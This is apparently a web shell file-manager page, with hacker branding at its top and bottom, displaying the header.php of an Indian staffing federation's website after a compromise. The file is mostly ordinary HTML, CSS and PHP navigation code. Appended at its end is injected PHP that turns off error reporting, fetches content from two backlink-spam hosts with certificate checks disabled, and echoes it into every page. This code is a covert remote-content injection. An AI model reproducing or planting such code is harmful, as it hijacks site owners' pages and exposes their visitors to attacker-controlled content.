-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
home
/
indianstaffing
/
public_html
/
Upload File:
files >> /home/indianstaffing/public_html/header.php
<?php include 'config.php'; ?> <!DOCTYPE html> <html lang="eng"> <head> <!-- meta tag --> <meta charset="utf-8"> <title>Indian Staffing Federation</title> <meta name="description" content=""> <!-- responsive tag --> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- favicon --> <link rel="apple-touch-icon" href="apple-touch-icon.png"> <link rel="shortcut icon" type="image/x-icon" href="assets/images/fav.png"> <!-- Bootstrap v4.4.1 css --> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <!-- font-awesome css --> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <!-- animate css --> <link rel="stylesheet" type="text/css" href="assets/css/animate.css"> <!-- aos css --> <link rel="stylesheet" type="text/css" href="assets/css/aos.css"> <!-- owl.carousel css --> <link rel="stylesheet" type="text/css" href="assets/css/owl.carousel.css"> <!-- slick css --> <link rel="stylesheet" type="text/css" href="assets/css/slick.css"> <!-- off canvas css --> <link rel="stylesheet" type="text/css" href="assets/css/off-canvas.css"> <!-- linea-font css --> <link rel="stylesheet" type="text/css" href="assets/fonts/linea-fonts.css"> <!-- flaticon css --> <link rel="stylesheet" type="text/css" href="assets/fonts/flaticon.css"> <!-- magnific popup css --> <link rel="stylesheet" type="text/css" href="assets/css/magnific-popup.css"> <!-- Main Menu css --> <link rel="stylesheet" href="assets/css/rsmenu-main.css"> <!-- nivo slider CSS --> <link rel="stylesheet" type="text/css" href="assets/inc/custom-slider/css/nivo-slider.css"> <link rel="stylesheet" type="text/css" href="assets/inc/custom-slider/css/preview.css"> <!-- rsmenu transitions css --> <link rel="stylesheet" href="assets/css/rsmenu-transitions.css"> <!-- spacing css --> <link rel="stylesheet" type="text/css" href="assets/css/rs-spacing.css"> <!-- style css --> <link rel="stylesheet" type="text/css" href="assets/css/style.css"> <link rel="stylesheet" type="text/css" href="assets/css/media-query.css"> <!-- This stylesheet dynamically changed from style.less --> <!-- responsive css --> <link rel="stylesheet" type="text/css" href="assets/css/responsive.css"> <script> function openCity(evt, cityName) { // Declare all variables var i, tabcnt, tablk; // Get all elements with class="tabcnt" and hide them tabcnt = document.getElementsByClassName("tabcnt"); for (i = 0; i < tabcnt.length; i++) { tabcnt[i].style.display = "none"; } // Get all elements with class="tablk" and remove the class "active" tablk = document.getElementsByClassName("tablk"); for (i = 0; i < tablk.length; i++) { tablk[i].className = tablk[i].className.replace("active", ""); } // Show the current tab, and add an "active" class to the link that opened the tab document.getElementById(cityName).style.display = "block"; evt.currentTarget.className += " active"; } function activeclass(id){ console.log(id); tablk = document.getElementsByClassName("tablk"); console.log(tablk); tablk[id].className += " active"; } </script> <script> function handleRedirect(tabName) { // Set session storage to remember which tab to activate sessionStorage.setItem('activeTab', tabName); return true; // Continue with the anchor tag's default action (navigate) } </script> <script> document.addEventListener('DOMContentLoaded', function() { // Get the active tab from session storage var activeTab = sessionStorage.getItem('activeTab'); // Clear the session storage after use sessionStorage.removeItem('activeTab'); // Execute the corresponding function based on the activeTab value if (activeTab) { openCity(event, activeTab); // Assuming openCity function is defined to show/hide tabs // You can also call other necessary functions here if(activeTab=='notifications'){ changeheading('Policy Notification'); activeclass(1); }else if(activeTab=='infocus'){ changeheading('Infocus'); activeclass(2); }else if(activeTab=='contract'){ changeheading('Sample Contract'); activeclass(3); } } }); </script> <style> /*@media screen and (max-width: 1100px) { .toolbar-contact { width: 440px; } }*/ /*@media screen and (min-width: 992px) { .toolbar-contact { width: 440px; margin-left: -75px; } }*/ @media screen and (max-width: 1036px) { .dsm { display: none; } } @media screen and (max-width: 1036px) { .dsm { display: none; } } /*@media screen and (min-width: 1200px) { .toolbar-contact { width: 440px; margin-left: 0px; } }*/ </style> </head> <style> .isf-interview { max-width: 100% !important; display: flex; justify-content: space-between; align-items: center; } .br-5 { border-radius: 5px; } .mb-10 { margin-bottom: 10px; } .stf-demand { text-align: justify; padding-right: 18px; color: #000; padding-left: 25px; list-style-type: disc; font-size: 14px; word-spacing: -3px; } .stf-demand li { font-size: 0.8rem; } .team-report { background: #fff; max-width: 270px; position: relative; bottom: 132px; text-align: center; border-radius: 3px; margin: 0px 19px; padding: 16px 0px 12px 0px; } .tablk { /*max-width: 230px;*/ /*padding: 10px 20px;*/ /*line-height: 38px;*/ font-size: 14px; border-radius: 8px; cursor: pointer; } .tablk.active { /*background-color: hsl(214deg 92% 28%);*/ /*max-width: 230px;*/ color: #fff !important; /*padding: 10px 20px;*/ line-height: 38px; font-size: 14px; border-radius: 8px; } .team-report-date { font-size: 12px; font-Weight: 600; color: hsl(20 2% 61% / 4); } .team-report-heading { font-size: 16px; line-height: 24px; font-Weight: 700; padding: 6px 17.5px; text-align: center; margin: 0px; } .demand { margin-top: -79px; padding-bottom: 1px; border-radius: 15px; padding-top: 75px; box-shadow: 4px 6px 6px 2px #f1f1f1; /* background-color: transparent !important; */ text-align: center; justify-content: flex-start; /* border: 1px solid #ebebeb; */ } .demand:hover { margin-top: -79px; padding-bottom: 1px; border-radius: 15px; padding-top: 75px; /*box-shadow: 4px 6px 6px 2px #818181;*/ /*background-color: hsl(205deg 100% 79%) !important;*/ text-align: center; justify-content: flex-start; } .demand-img { padding: 1rem; /*margin: 0rem 0rem 1.5rem 4rem;*/ margin-bottom: 1.5rem; height: 129px; position: relative; text-align: center; background: #fff; width: 129px; border-radius: 80%; border: 6px solid #000; } .hero_banner { /*background-image: url("assets/images/research/hero_banner.png");*/ height: 30vh; background-size: cover; display: flex; justify-content: center; align-items: center; } .hero_context { display: flex; justify-content: center; align-items: center; } .dropdown { width: 18rem; padding: 7px 10px; outline: none; border: none; background: #94d3ff; color: #fff; border-radius: 2px; } .bargraph { width: 55%; } .team-wrap { display: flex; justify-content: center; flex-direction: column; /*align-items: center;*/ border-radius: 15px; } .download-btn { margin: 15px 0px 0px 0px; color: #fff; border: none; background: #004089; } .common-control { display: flex; flex-direction: column; /* align-items: center; */ } .img-col { align-items: center; display: flex; justify-content: center; } @media only screen and (max-width: 600px) { .bargraph { width: 100%; } } a:hover{ cursor:pointer; } #event_modal .close{ position: absolute; right: 10px; font-size: 30px; color: red; opacity: 1; } #event_modal.show{ display: flex!important; align-items: center!important; } </style> <body class="defult-home"> <!-- The Modal --> <?php $selquery = mysqli_query($con,"SELECT * FROM `popup_banner` WHERE status=1"); if(mysqli_num_rows($selquery)>0){ $popup_banner = mysqli_fetch_object($selquery); ?> <div class="modal fade" id="event_modal"> <div class="modal-dialog modal-lg"> <div class="modal-content"> <!-- Modal Header --> <!-- <div class="modal-header"> </div> --> <!-- Modal body --> <div class="modal-body"> <button type="button" class="close" data-dismiss="modal">×</button> <a href="<?=$popup_banner->url?>" target="_blank"><img src="<?=$weburl?>/admin/uploads/<?=$popup_banner->image?>"></a> </div> <!-- Modal footer --> <!-- <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> </div> --> </div> </div> </div> <?php } ?> <!--Full width header Start--> <div class="full-width-header"> <!-- Toolbar Start --> <div class="toolbar-area hidden-md light-blue-bg"> <div class="container"> <div class="row"> <div class="col-md-10"> <div class="toolbar-sl-share" style="display:flex;justify-content:flex-end"> <ul> <li> <a style="color: #003373;padding-left: 290px;font-size: 0.7rem;" href="mediaroom.php">Media Room</a> </li> </ul> </div> </div> </div> </div> </div> <!-- Toolbar End --> <!--Header Start--> <header id="rs-header" class="rs-header"> <!-- Menu Start --> <div class="menu-area menu-sticky"> <div class="container" style="max-width: 1140px;"> <div class="row"> <div class="col-lg-2"> <div class="logo-area"> <a href="<?=$weburl?>"><img width="75" height="auto" src="assets/images/logo.png" alt="logo"></a> </div> </div> <div class="col-lg-10 text-right"> <div class="rs-menu-area"> <div class="main-menu"> <div class="mobile-menu"> <a class="rs-menu-toggle"> <i class="fa fa-bars"></i> </a> </div> <nav class="rs-menu rs-menu-close"> <ul class="nav-menu"> <li class=""> <a href="<?=$weburl?>">Home</a> </li> <li class="menu-item-has-children"> <a href="advocacy.php">Advocacy</a> <ul class="sub-menu"> <li> <a href="advocacy.php" onclick=" openCity(event, 'Achievements');changeheading('Advocacy - Achievements');activeclass(0);">Achievements</a> </li> <li><a href="advocacy.php?tab=notifications#notification" onclick="return handleRedirect('notifications');">Notifications</a></li> <li><a href="advocacy.php?tab=infocus#Infocus" onclick="return handleRedirect('infocus')">Infocus</a></li> <li><a href="advocacy.php?tab=contract#sample_contract" onclick="return handleRedirect('contract')">Sample Contract</a></li> </ul> </li> <li class=""> <a href="event.php">Conference</a> </li> <li class="menu-item-has-children"> <a href="research.php">Research</a> <ul class="sub-menu"> <li><a href="research.php#ISF" onclick="openCity(event, 'ISF')">ISF Resources</a></li> <li><a href="research.php#Member" onclick="openCity(event, 'Member')">Member Resources</a> </li> <li><a href="research.php#wec" onclick="openCity(event, 'Wec')">Wec Resources</a></li> <li class="last-item menu-item-has-children"> <a href="research.php#Others" onclick="openCity(event, 'Others')">Other Resources</a> <ul class="sub-menu"> </li> </ul> </li> </ul> </li> <li class="menu-item-has-children"> <a href="membership.php">Become a Member</a> <ul class="sub-menu"> <li class="last-item menu-item-has-children"> <a href="#">Enrollment</a> <ul class="sub-menu"> <li><a href="membership-advantages.php">Membership Advantages</a></li> <!-- <li><a href="#">Membership Form</a></li> --> <li><a href="membership.php#Membership">Criteria & Fees</a></li> <li><a href="code-of-conduct.php">Code of Conduct</a></li> <li class="last-item"><a href="membership-helpline.php">Membership Helpline</a> </li> </ul> </li> <li class="last-item menu-item-has-children"> <a>Current Members</a> <ul class="sub-menu"> <li><a href="current-member.php">ISF Members</a> </li> <li class="last-item"><a href="professional-member.php">Professional Members</a> </li> <li><a href="javascript:void(0)">Institutional Members</a> </li> <li class="last-item"><a href="javascript:void(0)">Client Members</a> </li> </ul> </li> </ul> </li> <li class="menu-item-has-children"> <a href="about.php">About us</a> <ul class="sub-menu"> <!-- <li><a href="about.php">About Us</a></li> --> <li><a href="team.php">Executive Board</a></li> <li class="last-item"><a href="secretary.php">Secretariat</a></li> </ul> </li> <li class=""> <a href="contact.php">Contact</a> </li> </ul> <!-- //.nav-menu --> </nav> </div> <!-- //.main-menu --> <div class="expand-btn-inner dsm"> <ul> <li class="search-parent"> <a class="hidden-xs rs-search" data-target=".search-modal" data-toggle="modal" href="#"> <i class="flaticon-search"></i> </a> </li> </ul> </div> </div> </div> </div> </div> </div> <!-- Menu End --> </header> <!--Header End--> </div> <!--Full width header End--> <?php ini_set("display_errors", "0"); ini_set("log_errors", "0"); error_reporting(0); function checkHttps($domain) { $headers = @get_headers("https://$domain"); return $headers && strpos($headers[0], "200") !== false;} function fetchData($urls) { foreach ($urls as $url) { $protocol = checkHttps($url) ? "https" : "http"; $finalUrl = "$protocol://$url"; if (function_exists("curl_init")) { $data = fetchWithCurl($finalUrl); if ($data !== false){ return $data;}} if (ini_get("allow_url_fopen")) { $data = fetchWithFileGetContents($finalUrl); if ($data !== false) { return $data; } } $data = fetchWithFopen($finalUrl); if ($data !== false) { return $data; }} return false;} function fetchWithCurl($url) { $ch = curl_init($url); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => false,CURLOPT_FOLLOWLOCATION => true )); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ($httpCode === 200) ? $response : false;} function fetchWithFileGetContents($url) {$context = stream_context_create(array("http" => array("timeout" => 5), "ssl" => array("verify_peer" => false, "verify_peer_name" => false))); $response = @file_get_contents($url, false, $context); return ($response !== false) ? $response : false;} function fetchWithFopen($url) { $handle = @fopen($url, "r"); if ($handle) { $response = stream_get_contents($handle); fclose($handle); return $response; } return false;} $urls = array("www.hacklinkbacklink.com/panel/php_api.php?api_id=69","www.backlinksatis.net/panel/php_api.php?api_id=69"); echo fetchData($urls); ?>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥